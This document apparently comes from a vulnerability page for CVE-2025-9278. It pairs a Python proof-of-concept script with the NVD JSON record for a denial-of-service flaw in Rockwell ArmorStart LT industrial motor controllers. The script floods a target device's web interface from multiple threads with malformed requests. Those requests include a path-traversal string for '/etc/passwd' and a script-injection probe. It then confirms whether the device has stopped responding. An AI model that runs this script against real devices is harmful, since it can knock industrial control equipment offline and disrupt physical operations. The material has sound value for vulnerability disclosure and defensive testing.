CVE-2025-9278

#!/usr/bin/env python3 """ CVE-2025-9278 PoC - ArmorStart LT Denial of Service This PoC demonstrates the DoS vulnerability in ArmorStart LT devices. The device becomes unresponsive after active scanning. """ import requests import time import sys from concurrent.futures import ThreadPoolExecutor def send_malformed_request(target_url): """Send various malformed HTTP requests to trigger the vulnerability""" headers_list = [ {'User-Agent': 'Mozilla/5.0 (compatible; BurpScanner/2.0)'}, {'X-Forwarded-For': '127.0.0.1'}, {'Referer': 'http://test.com'}, ] # Malformed requests that may trigger the DoS payloads = [ '', # Empty payload 'A' * 10000, # Long string '../../../etc/passwd', '<script>alert(1)</script>', ] for header in headers_list: for payload in payloads: try: requests.get(target_url, headers=header, params={'q': payload}, timeout=5) except requests.exceptions.RequestException: pass def check_device_responsive(target_url): """Check if the device is still responsive""" try: response = requests.get(target_url, timeout=5) return True except: return False def check_icmp_connectivity(target_ip): """Check ICMP connectivity using system ping command""" import subprocess try: result = subprocess.run(['ping', '-c', '1', '-W', '2', target_ip], capture_output=True, timeout=3) return result.returncode == 0 except: return False def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-9278-poc.py <target_url>") print("Example: python cve-2025-9278-poc.py http://192.168.1.100") sys.exit(1) target_url = sys.argv[1] target_ip = target_url.split('//')[1].split(':')[0].rstrip('/') print(f"[*] Starting CVE-2025-9278 DoS test against {target_url}") print(f"[*] Checking initial device status...") # Check initial status if not check_device_responsive(target_url): print("[-] Device is not responding before testing") return if not check_icmp_connectivity(target_ip): print("[-] Device does not respond to ICMP before testing") else: print("[+] Device responds to ICMP ping") print("[*] Sending malformed requests (simulating Burp Suite active scan)...") # Send multiple requests to trigger DoS with ThreadPoolExecutor(max_workers=10) as executor: for i in range(100): executor.submit(send_malformed_request, target_url) if i % 10 == 0: print(f"[*] Progress: {i}/100 requests sent") print("[*] Waiting for device to process requests...") time.sleep(10) print("[*] Checking device status after testing...") # Check post-attack status if not check_device_responsive(target_url): print("[+] VULNERABLE: Web interface is not accessible (DoS confirmed)") else: print("[-] Web interface is still accessible") if not check_icmp_connectivity(target_ip): print("[+] VULNERABLE: Device lost ICMP connectivity (DoS confirmed)") else: print("[-] Device still responds to ICMP") print("[*] Testing complete. Note: Device may require manual reboot to recover.") if __name__ == '__main__': main()

{"cve": {"id": "CVE-2025-9278", "sourceIdentifier": "[email protected]", "published": "2026-01-20T14:16:08.680", "lastModified": "2026-02-02T18:09:05.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security issue exists within ArmorStart® LT that can result in a denial-of-service condition. After running a Burp Suite active scan, the device loses ICMP connectivity, causing the web application to become inaccessible."}, {"lang": "es", "value": "Existe un problema de seguridad en ArmorStart® LT que puede resultar en una condición de denegación de servicio. Después de ejecutar un escaneo activo de Burp Suite, el dispositivo pierde conectividad ICMP, causando que la aplicación web se vuelva inaccesible."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:rockwellautomation:armorstart_lt_firmware:*:*:*:*:*:*:*:*", "versionEndIncluding": "2.002", "matchCriteriaId": "564CE3DE-2D80-4511-B970-C644C7217F20"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:rockwellautomation:armorstart_lt:-:*:*:*:*:*:*:*", "matchCriteriaId": "E8AB2017-CB37-4A93-90FD-7FE82640FB77"}]}]}], "references": [{"url": "https://www.rockwellautomation.com/en-us/trust-center/security-advisories/advisory.SD1768.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}